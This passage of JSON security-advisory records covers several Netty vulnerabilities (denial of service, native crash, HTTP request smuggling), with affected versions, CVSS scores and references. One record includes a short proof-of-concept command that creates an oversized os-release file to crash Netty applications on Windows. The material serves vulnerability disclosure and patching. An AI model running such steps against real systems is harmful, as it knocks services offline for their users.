"4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", 
"4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-389x-839f-4rhx/GHSA-389x-839f-4rhx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25193" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250221-0006" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T18:14:47Z", "nvd_published_at": "2025-02-10T22:15:38Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xq3w-v528-46rv", "published": "2024-11-12T19:53:17Z", "modified": "2025-02-18T16:16:53.215963Z", "aliases": [ "CVE-2024-47535" ], "related": [ "CGA-662r-hr8g-368h", "CGA-6hrh-hv46-9997", "CGA-6j48-cf22-44cr", "CGA-896j-whgv-hvrh", "CGA-954h-x5w4-9mp8", "CGA-973v-pfgw-gfcx", "CGA-9g9w-93jp-5j27", "CGA-cm4q-39fx-m36q", "CGA-crgc-hmgg-8m6p", "CGA-fp8m-fwcf-c57x", "CGA-j7w7-m586-rmf6", "CGA-m937-hhxp-2gm9", "CGA-pj55-r8cf-957f", "CGA-q7qp-mqc2-cqff", "CGA-qpr4-x3v9-rvj7", "CGA-vv7m-rc5q-gr82", "CGA-x6pw-hh9f-9g3j", "CGA-xpg8-pwc5-69x9" ], "summary": "Denial of Service attack on windows 
app using netty", "details": "### Summary\n\nAn unsafe reading of an environment file could potentially cause a denial of service in Netty.\nWhen loaded in a Windows application, Netty attempts to load a file that does not exist. If an attacker creates a large file at that location, the Netty application crashes.\n\n\n### Details\n\nWhen the library netty is loaded in a java windows application, the library tries to identify the system environment in which it is executed.\n\nAt this stage, Netty tries to load both `/etc/os-release` and `/usr/lib/os-release` even though it is in a Windows environment. \n\n\u003cimg width=\"364\" alt=\"1\" src=\"https://github.com/user-attachments/assets/9466b181-9394-45a3-b0e3-1dcf105def59\"\u003e\n\nIf netty finds these files, it reads them and loads them into memory.\n\nBy default :\n\n- The JVM maximum memory size is set to 1 GB,\n- A non-privileged user can create a directory at `C:\\` and create files within it.\n\n\u003cimg width=\"340\" alt=\"2\" src=\"https://github.com/user-attachments/assets/43b359a2-5871-4592-ae2b-ffc40ac76831\"\u003e\n\n\u003cimg width=\"523\" alt=\"3\" src=\"https://github.com/user-attachments/assets/ad5c6eed-451c-4513-92d5-ba0eee7715c1\"\u003e\n\nthe source code identified :\nhttps://github.com/netty/netty/blob/4.1/common/src/main/java/io/netty/util/internal/PlatformDependent.java\n\nDespite the implementation of the function `normalizeOs()` the source code does not verify the OS before reading `C:\\etc\\os-release` and `C:\\usr\\lib\\os-release`.\n\n### PoC\n\nCreate a file larger than 1 GB of data in `C:\\etc\\os-release` or `C:\\usr\\lib\\os-release` in a Windows environment and start your Netty application.\n\nTo observe what the application does with the file, the security analyst used \"Process Monitor\" from the \"Windows SysInternals\" suite. 
(https://learn.microsoft.com/en-us/sysinternals/)\n\n```\ncd C:\\etc\nfsutil file createnew os-release 3000000000\n```\n\n\u003cimg width=\"519\" alt=\"4\" src=\"https://github.com/user-attachments/assets/39df22a3-462b-4fd0-af9a-aa30077ec08f\"\u003e\n\n\u003cimg width=\"517\" alt=\"5\" src=\"https://github.com/user-attachments/assets/129dbd50-fc36-4da5-8eb1-582123fb528f\"\u003e\n\nThe source code used is the Netty website code example : [Echo ‐ the very basic client and server](https://netty.io/4.1/xref/io/netty/example/echo/package-summary.html).\n\nThe vulnerability was tested on the 4.1.112.Final version.\n\nThe security analyst tried the same technique for `C:\\proc\\sys\\net\\core\\somaxconn` with a lot of values to impact Netty but the only thing that works is the \"larger than 1 GB file\" technique. https://github.com/netty/netty/blob/c0fdb8e9f8f256990e902fcfffbbe10754d0f3dd/common/src/main/java/io/netty/util/NetUtil.java#L186\n\n### Impact\n\nBy loading the \"file larger than 1 GB\" into memory, the Netty library exceeds the JVM memory limit and causes a crash in the java Windows application.\n\nThis behaviour occurs 100% of the time in both Server mode and Client mode if the large file exists.\n\nClient mode :\n\n\u003cimg width=\"449\" alt=\"6\" src=\"https://github.com/user-attachments/assets/f8fe1ed0-1a42-4490-b9ed-dbc9af7804be\"\u003e\n\nServer mode :\n\n\u003cimg width=\"464\" alt=\"7\" src=\"https://github.com/user-attachments/assets/b34b42bd-4fbd-4170-b93a-d29ba87b88eb\"\u003e\n\nsomaxconn :\n\n\u003cimg width=\"532\" alt=\"8\" src=\"https://github.com/user-attachments/assets/0656b3bb-32c6-4ae2-bff7-d93babba08a3\"\u003e\n\n### Severity\n\n- Attack vector : \"Local\" because the attacker needs to be on the system where the Netty application is running.\n- Attack complexity : \"Low\" because the attacker only needs to create a massive file (regardless of its contents).\n- Privileges required : \"Low\" because the attacker requires a user account 
to exploit the vulnerability.\n- User interaction : \"None\" because the administrator doesn't need to accidentally click anywhere to trigger the vulnerability. Furthermore, the exploitation works with default Windows/AD settings.\n- Scope : \"Unchanged\" because only Netty is affected by the vulnerability.\n- Confidentiality : \"None\" because no data is exposed through exploiting the vulnerability.\n- Integrity : \"None\" because the exploitation of the vulnerability does not allow editing, deleting or adding data elsewhere.\n- Availability : \"High\" because the exploitation of this vulnerability crashes the entire java application.", "affected": [ { "package": { "name": "io.netty:netty-common", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.115.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", 
"4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.11.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", 
"4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.114.Final", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-xq3w-v528-46rv/GHSA-xq3w-v528-46rv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47535" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/fbf7a704a82e7449b48bd0bbb679f5661c6d61a3" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2024-11-12T19:53:17Z", "nvd_published_at": "2024-11-12T16:15:22Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4g8c-wm8x-jfhw", "published": "2025-02-10T17:38:10Z", "modified": "2025-04-16T19:36:10.233999Z", "aliases": [ "CVE-2025-24970" ], "related": [ "CGA-2rmr-wmhc-2w99", "CGA-3ff3-j2gh-ch6w", "CGA-4c9r-4w8v-hrg9", "CGA-4fc4-gx3h-pr85", "CGA-4vhm-8vvc-xp32", "CGA-5j2r-r3qg-5f8j", "CGA-5w34-p6wm-7m57", "CGA-75hc-h3fm-76g3", "CGA-77xw-mv88-q2mp", "CGA-8qcx-xrm8-v435", "CGA-92vf-fmhh-m858", "CGA-9cfj-2vcq-2qmg", "CGA-f8r8-7qpm-75vh", "CGA-g9f5-gvgx-jg3v", "CGA-gj2p-246v-gxg2", "CGA-hvvp-w5fp-mfj3", "CGA-pxx2-j5vx-hpc7", "CGA-q4fc-47cm-pg7p", "CGA-q847-pq59-hvfv", "CGA-v2hv-cwjf-vh29", "CGA-v56f-9x62-8x8w", "CGA-vpqx-mv83-m9q3", "CGA-vxw2-mqpj-vp92", "CGA-w7hc-8fp9-mm8j", "CGA-xvj3-hqwc-49qg", "CVE-2025-24970" ], "summary": "SslHandler doesn't correctly validate packets which can 
lead to native crash when using native SSLEngine", "details": "### Impact\nWhen a specially crafted packet is received via SslHandler it doesn't correctly handle validation of such a packet in all cases which can lead to a native crash.\n\n### Workarounds\nAs a workaround it's possible to either disable the usage of the native SSLEngine or change the code from:\n\n```\nSslContext context = ...;\nSslHandler handler = context.newHandler(....);\n```\n\nto:\n\n```\nSslContext context = ...;\nSSLEngine engine = context.newEngine(....);\nSslHandler handler = new SslHandler(engine, ....);\n```", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.91.Final" }, { "fixed": "4.1.118.Final" } ] } ], "versions": [ "4.1.100.Final", "4.1.101.Final", "4.1.102.Final", "4.1.103.Final", "4.1.104.Final", "4.1.105.Final", "4.1.106.Final", "4.1.107.Final", "4.1.108.Final", "4.1.109.Final", "4.1.110.Final", "4.1.111.Final", "4.1.112.Final", "4.1.113.Final", "4.1.114.Final", "4.1.115.Final", "4.1.116.Final", "4.1.117.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final", "4.1.94.Final", "4.1.95.Final", "4.1.96.Final", "4.1.97.Final", "4.1.98.Final", "4.1.99.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.117.Final", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-4g8c-wm8x-jfhw/GHSA-4g8c-wm8x-jfhw.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-4g8c-wm8x-jfhw" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24970" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/87f40725155b2f89adfde68c7732f97c153676c4" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250221-0005" }, 
{ "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-detection" }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-24970-netty-vulnerability-mitigation" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T17:38:10Z", "nvd_published_at": "2025-02-10T22:15:38Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6mjq-h674-j845", "published": "2023-06-20T16:33:22Z", "modified": "2024-10-22T05:29:07.697767Z", "aliases": [ "CGA-4p9j-8g99-x3wm", "CVE-2023-34462" ], "related": [ "CGA-cp7x-r3q6-pfcj", "CGA-h5cv-9cc6-j4jf", "CGA-r5mp-477x-xh5j", "CGA-rq5c-v396-7c72", "CGA-xcw6-rv74-mwgj", "CVE-2023-34462" ], "summary": "netty-handler SniHandler 16MB allocation", "details": "### Summary\nThe `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.\n\n### Details\nThe `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. 
\n\nNormally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`\n\n1/ allocate a 16MB `ByteBuf`\n2/ not fail `decode` method `in` buffer\n3/ get out of the loop without an exception\n\nThe combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.\n\n### Impact\nIf the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.94.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", 
"4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.68.Final", "4.1.69.Final", "4.1.7.Final", "4.1.70.Final", "4.1.71.Final", "4.1.72.Final", "4.1.73.Final", "4.1.74.Final", "4.1.75.Final", "4.1.76.Final", "4.1.77.Final", "4.1.78.Final", "4.1.79.Final", "4.1.8.Final", "4.1.80.Final", "4.1.81.Final", "4.1.82.Final", "4.1.83.Final", "4.1.84.Final", "4.1.85.Final", "4.1.86.Final", "4.1.87.Final", "4.1.88.Final", "4.1.89.Final", "4.1.9.Final", "4.1.90.Final", "4.1.91.Final", "4.1.92.Final", "4.1.93.Final" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-6mjq-h674-j845/GHSA-6mjq-h674-j845.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34462" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/535da17e45201ae4278c0479e6162bb4127d4c32" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230803-0001" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240621-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5558" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-06-20T16:33:22Z", "nvd_published_at": "2023-06-22T23:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9959-6p3m-wxpc", "published": "2020-06-30T21:01:31Z", "modified": "2023-11-08T03:57:37.697735Z", "aliases": [ "CVE-2014-3488" ], "summary": "Denial of service in Netty", "details": "The SslHandler in Netty before 3.9.2 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted SSLv2Hello message.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.9.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-9959-6p3m-wxpc/GHSA-9959-6p3m-wxpc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3488" }, { "type": "WEB", "url": 
"https://github.com/netty/netty/issues/2562" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/2fa9400a59d0563a66908aba55c41e7285a04994" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-ORGJBOSSNETTY-31630" }, { "type": "WEB", "url": "http://netty.io/news/2014/06/11/3-9-2-Final.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/59196" } ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:50:42Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-ff2w-cq2g-wv5f", "published": "2020-02-21T18:55:50Z", "modified": "2024-03-14T05:20:05.937087Z", "aliases": [ "CVE-2020-7238" ], "summary": "HTTP Request Smuggling in Netty", "details": "Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. 
This issue exists because of an incomplete fix for CVE-2019-16869.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.43" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.1.43.Final", "4.1.44.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c= 4.1.44", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-ff2w-cq2g-wv5f/GHSA-ff2w-cq2g-wv5f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7238" }, { "type": "WEB", "url": "https://github.com/jdordonezn/CVE-2020-72381/issues/1" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://netty.io/news" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:49Z", "nvd_published_at": "2020-01-27T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mm9x-g8pc-w292", "published": "2020-06-15T19:36:16Z", "modified": "2024-03-14T05:18:47.685399Z", "aliases": [ "CVE-2020-11612" ], "summary": "Denial of Service in Netty", "details": "The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. 
An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.1.0" }, { "fixed": "4.1.46" } ] } ], "versions": [ "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": 